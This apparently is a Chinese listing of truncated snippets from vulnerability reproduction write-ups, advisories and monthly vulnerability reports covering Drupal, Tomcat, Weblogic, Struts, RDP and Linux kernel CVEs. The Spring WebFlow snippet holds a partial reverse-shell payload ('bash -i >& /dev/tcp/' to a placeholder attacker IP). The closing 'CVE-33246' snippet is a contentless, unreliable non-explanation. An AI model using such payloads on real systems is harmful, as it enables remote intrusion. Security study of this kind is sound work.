CVE-2018-19518漏洞复现CVE-2018-19518漏洞复现本⽂仅限技术研究与讨论，严禁⽤于⾮法⽤途，否则产⽣的⼀切后果⾃⾏承担CVE-2018-19518漏洞介绍php imap扩展⽤户在php中执⾏邮件收发操作，其imap_open函数会调⽤rsh来连接远程shell，⽽debianh/Ubuntu中默认使⽤ssh来代替rsh功能，也就是说debian系列系统中，执⾏rsh命令实际...

Drupal远程代码执⾏漏洞（CVE-2019-6339）漏洞分析简介Drupal core是Drupal社区所维护的⼀套⽤PHP语⾔开发的免费、开源的内容管理系统。漏洞概述Drupal core 7.62之前的7.x版本、8.6.6之前的8.6.x版本和8.5.9之前的8.5.x版本中的内置phar stream wrapper（PHP）存在远程代码执⾏漏洞。远程攻击者可利⽤该漏洞执⾏任意的ph...

openssl升级_CVE-2020-1967：openssl拒绝服务漏洞通告0x01 漏洞背景2020年04⽉21⽇， 360CERT监测发现 openssl 官⽅发布了 TLS 1.3 组件拒绝服务漏洞 的风险通告，该漏洞编号为 CVE-2020-1967，漏洞等级：⾼危。openssl 是⼀个开放源代码的软件库包，应⽤程序可以使⽤这个包来进⾏安全通信。这个包⼴泛被应⽤在互联⽹的⽹页服务器上。...

TomcatPUT⽅法任意写⽂件漏洞（CVE-2017-12615）Tomcat PUT⽅法任意写⽂件漏洞（CVE-2017-12615）漏洞概述:如果Tomcat开启了PUT⽅法(默认关闭，有点鸡肋，但是有些页⾯需要PUT，⽆法关闭)，则有可能存在远程命令执⾏漏洞，攻击者可以利⽤PUT⽅法上传jsp⽂件，从⽽造成远程命令执⾏，getshell等。漏洞版本：cve漏洞库7.0.0~7.0.79漏洞...

（环境搭建+复现）CVE-2019-6341DrupalXSS漏洞【CVE编号】CVE-2019-6341【漏洞名称】Drupal XSS漏洞1【靶标分类】Web类型类靶标2【影响版本】在7.65之前的Drupal 7版本中； 8.6.13之前的Drupal 8.6版本; 8.5.14之前的Drupal 8.5版本。3【漏洞分类】XSS4【漏洞等级】中5【漏洞简介】Drupal诞⽣于2000年，是...

84542017年4月十大重要安全漏洞分析2017年3月21日至2017年4月20日，国家计算机网络入侵防范中心发布漏洞总条目1026条，漏洞总数为上月的1.25倍 ，有所上升。其中威胁级别为“紧急”的有112条，“高”的有150条，“中”的有514条，“低”的有250条。威胁级别为“紧急”和“高”的漏洞占到总量的25.54% 。从漏洞利用方式来看，能够利用从远程进行攻击的漏洞占绝大多数，这使得攻...

932018年第2期452017年12月十大重要安全漏洞分析2017年11月21日至2017年12月20日，国家计算机网络入侵防范中心发布漏洞总条目1418条，漏洞总数为上月的0.64倍 ，有所降低。其中威胁级别为“高”的有557条，“中”的有748条，“低”的有113条。威胁级别为“高”的漏洞占到总量的39.28% 。从漏洞利用方式来看，能够利用从远程进行攻击的漏洞占绝大多数，这使得攻击者利用相...

CVE-2019-0708追踪记录漏洞编号：CVE-2019-0708漏洞类型：Windows远程桌⾯服务（RDS）远程执⾏代码漏洞漏洞危害：远程⾼危漏洞简介： 由于漏洞是预⾝份验证，未经⾝份验证的攻击者可以通过RDP连接到存在此漏洞的系统，成功利⽤此漏洞后可以在⽬标系统上执⾏任意代码。该漏洞可能导致蠕⾍病毒在未受保护的系统中爆发。易受攻击的操作系统：Windows 2003Windows XPW...

Netlogon特权提升漏洞（CVE-2020-1472）原理分析与验证漏洞简介CVE-2020-1472是⼀个windows域控中严重的远程权限提升漏洞，是因为微软在Netlogon协议中没有正确使⽤加密算法⽽导致的漏洞。由于微软在Netlogon协议中没有正确使⽤加密算法⽽导致的漏洞，由于微软在进⾏AES加密运算过程中，使⽤了AES-CFB8模式并且错误的将IV设置为全零，这使得攻击者在明⽂(...

OracleWeblogic反序列化漏洞（CVE-2018-2893）的补丁升级操作Oracle官⽅发布了7⽉份的关键补丁更新 CPU（CriticalPatchUpdate ），其中包含⼀个⾼危的 Weblogic 反序列化漏洞 (CVE-2018-2893 )，该漏洞通过JRMP协议利⽤RMI机制的缺陷达到执⾏任意反序列化代码的⽬。 攻击者可以在未授权情况下将 payload 封装在T3协议中...

spring框架远程代码执⾏漏洞（CVE-2017-4971）漏洞影响影响版本：Spring WebFlow 2.4.0 - 2.4.4漏洞复现搭建漏洞环境并访问点击左上⾓登录，使⽤左边给的⽤户名密码登录登录后点击confirm时，进⾏抓包&_(new+java.lang.ProcessBuilder("bash","-c","bash+-i+>%26+/dev/tcp/攻击机IP/...

【安全】Web渗透测试（全流程）1 信息收集1.1 域名、IP、端⼝域名信息查询：信息可⽤于后续渗透IP信息查询：确认域名对应IP，确认IP是否真实，确认通信是否正常端⼝信息查询：NMap扫描，确认开放端⼝如果不会⽤Nmap，看这⾥：发现：⼀共开放两个端⼝，80为web访问端⼝，3389为windows远程登陆端⼝，嘿嘿嘿，试⼀下发现：是Windows Server 2003系统，OK，到此为⽌。...

ActiveMQ任意⽂件写⼊漏洞（CVE-2016-3088）复现⼀、漏洞描述该漏洞出现在fileserver应⽤中，漏洞原理:ActiveMQ中的fileserver服务允许⽤户通过HTTP PUT⽅法上传⽂件到指定⽬录。Fileserver⽀持写⼊⽂件(不解析jsp)，但是⽀持移动⽂件(Move)我们可以将jsp的⽂件PUT到Fileserver下，然后再通过Move指令移动到可执⾏⽬录下访问...

cve-2020-15778openssh漏洞原理与思考该漏洞发⽣在2020年6⽉9⽇，在7⽉18⽇公开，但是由于原因没有及时的复现。但是⽹上有好多师傅们进⾏了复现，于是⾃⼰参考他们的⽂章⾃⼰也来学习⼀下。漏洞概要OpenSSH的8.3p1中的scp允许在scp.c远程功能中注⼊命令，攻击者可利⽤该漏洞执⾏任意命令。⽬前绝⼤多数linux系统受影响。但是前提是真的ssh⽤户名密码。openshh介...

14.Nginx ⽂件名逻辑漏洞（CVE-2013-4547）由于博主在渗透⽹站时发现现在Nginx搭建的⽹站是越来越多所以对Nginx的漏洞来⼀个全⾯性的复习，本次从Nginx较早的漏洞开始分析。2013年底，nginx再次爆出漏洞（CVE-2013-4547），此漏洞可导致⽬录跨越及代码执⾏，其影响版本为： Nginx  0.8.41 ~ 1.4.3 / 1.5.0 ~ 1.5.7，...

渗透测试-信息收集-Java-Spring-漏洞整理0x01 背景介绍Spring是⼀个开源框架，它由Rod Johnson创建。它是为了解决企业应⽤开发的复杂性⽽创建的。Spring使⽤基本的JavaBean来完成以前只可能由EJB完成的事情。然⽽，Spring的⽤途不仅限于服务器端的开发。从简单性、可测试性和松耦合的⾓度Spring集合：【1】Spring JDBC【2】Spring MVCS...

Exim缓冲区溢出漏洞（CVE-2019-15846、CNVD-2019-30794）排查⽅法⼀、漏洞概述Exim是⼀个运⾏于Unix系统中的开源消息传送代理（MTA），它主要负责邮件的路由、转发和投递。Exim存在缓冲区溢出漏洞，攻击者可利⽤该漏洞使⽤root权限执⾏任意代码。⼆、影响范围受影响的版本：4.92.1及以下的所有版本详情请参考如下链接：/static...

apache⽂件上传（CVE-2017-15715）漏洞复现apache ⽂件上传 CVE-2017-15715所有⽂章，仅供安全研究与学习之⽤，后果⾃负!apache ⽂件上传 (CVE-2017-15715)0x01 漏洞描述Apache(⾳译为阿帕奇)是世界使⽤排名第⼀的Web服务器软件。它可以运⾏在⼏乎所有⼴泛使⽤的计算机平台上，由于其跨平台和安全性被⼴泛使⽤，是最流⾏的Web服务器端软件...

S2-045远程代码执⾏漏洞Apache Struts 2被曝存在远程命令执⾏漏洞，漏洞编号S2-045，CVE编号CVE-2017-5638，在使⽤基于Jakarta插件的⽂件上传功能时，有可能存在远程命令执⾏，导致系统被⿊客⼊侵。恶意⽤户可在上传⽂件时通过修改HTTP请求头中的Content-Type值来触发该漏洞，进⽽执⾏系统命令。影响范围Struts 2.3.5 – Struts 2.3....

利用脆弱性扫描技术检测网络可靠性的方法在互联网时代，网络已成为人们生活的重要组成部分。然而，网络的可靠性却面临着众多安全威胁，尤其是网络脆弱性。为了确保网络的可靠性，在网络安全领域，利用脆弱性扫描技术来检测网络的安全性已成为一种必要手段。脆弱性扫描技术，简单来说，就是通过扫描目标系统的漏洞，发现其中存在的脆弱性，并通过相应的修补和加固来提高网络的安全性。这项技术广泛应用于企业、政府机构等组织，以及...

远程3389（CVE-2019-0708）漏洞复现受影响Windows系统版本：Windows7、Windows Server 2008 R2、Windows Server 2008、Windows 2003、Windows XP⽬标主机：IP地址：192.168.205.135⼀、运⾏MSF，确认⽬标主机是否存在漏洞0号为漏洞验证（check）模块，验证⽬标主机是否有CVE-2019-0708漏...

CVE-2016-5195（脏⽜）内核漏洞验证⼀：前⾔为什么叫脏⽜（Dirty COW）漏洞：因为Linux内核的内存⼦系统在处理写和拷贝时存在条件竞争漏洞，导致可以破快破坏私有只读内存映射。⼀个低权限的本地⽤户能够利⽤此漏洞获取其他只读内存映射的权限，实现本地提权。影响范围： Linux内核>=2.6.22实验环境：实验⼯具：gcc:linux下的编译器，⽤于编译程序  &nbs...

[漏洞分析]CVE-2022-0185linux内核提权（逃逸）CVE-2022-0185 linux 内核提权(逃逸)⽂章⽬录github地址：漏洞简介漏洞编号: CVE-2022-0185漏洞产品: linux kernel - fsconfig syscall影响版本: linux kernel 5.1-rc1 ~漏洞危害: 在cap_sys_admin 权限基础上进⾏提权或容器逃逸源码获取...

XStream反序列化命令执⾏漏洞复现（CVE-2021-29505）XStream反序列化命令执⾏漏洞复现（CVE-2021-29505）讲道理正经来讲这个实验需要四台机器模拟，不过条件有限，我就⽤两台机器模拟了。我们需要⼀台攻击机⼀台安装了xstream服务的机器⼀台安装了RMI服务的机器⼀台机器接收shell这⾥我的攻击机是我的物理机（192.168.0.103），其他的三台机器全部由虚拟机...

mongo-express远程代码执⾏（CVE-2019-10758）漏洞复现（msfve。。。mongo-expressmongo-express是⼀个MongoDB的Admin Web管理界⾯，基于NodeJS、Express、Bootstrap3开源编写漏洞介绍在开启了端⼝8081后，攻击者可以直接访问，⽽⽬标服务器上没有修改默认的登录密码admin/pass，则攻击者可以远程执⾏node....

Spring新版本修复远程命令执⾏漏洞（CVE-2022-22965），墨菲安全开源⼯具可应急排查漏洞简述3⽉31⽇，spring 官⽅通报了 Spring 相关框架存在远程代码执⾏漏洞，并在 5.3.18 和 5.2.20.RELEASE 中修复了该漏洞。漏洞评级：严重影响组件：org.springframework:spring-beans影响版本：< 5.3.18 和 < 5.2...

ApacheTomcatCVE-2019-0232远程代码执⾏漏洞漏洞简介2019年4⽉10⽇，Apache Tomcat报告了⼀个漏洞，报告中称在windows上运⾏的Apache Tomcat存在远程代码执⾏漏洞，漏洞编号为CVE-2019-0232。在Windows平台，远程攻击者向CGI Servlet发送⼀个精⼼设计的请求，在具有Apache Tomcat权限的系统上注⼊和执⾏任意操作系...

Weblogic漏洞复现——XMLDecoder（CVE-2017-10271）⼀、漏洞描述：CVE-2017-10271漏洞产⽣的原因是Weblogic的WLS Security组件对外提供webservice服务，其中使⽤了XMLDecoder来解析⽤户传⼊的XML数据，在解析的过程中出现反序列化漏洞，导致可执⾏任意命令。攻击者发送精⼼构造的xml数据甚⾄能通过反弹shell拿到权限。影响版本...

思科Catalyst2960交换机中的CVE-2017-3881漏洞分析思科Catalyst 2960交换机中的CVE-2017-3881漏洞分析，本⽂讲的是 思科Catalyst 2960交换机中的CVE-2017-3881漏洞分析2017年3⽉17⽇，思科官⽅⽹站发布公告称Cisco IOS&IOS XE Software 集管理协议(Cluster Management Proto...

cve--33246原理cve漏洞库CVE-33246是一种漏洞，具体原理与具体的软件或系统相关，我无法提供详细的解释。然而，通常来说，CVE-33246指的是被发现的并且被命名为CVE-33246的漏洞。解析该漏洞的具体原理需要参考其对应的漏洞描述、漏洞公告或漏洞报告。这些信息可以在CVE数据库、厂商的安全公告或其他安全报告中到。...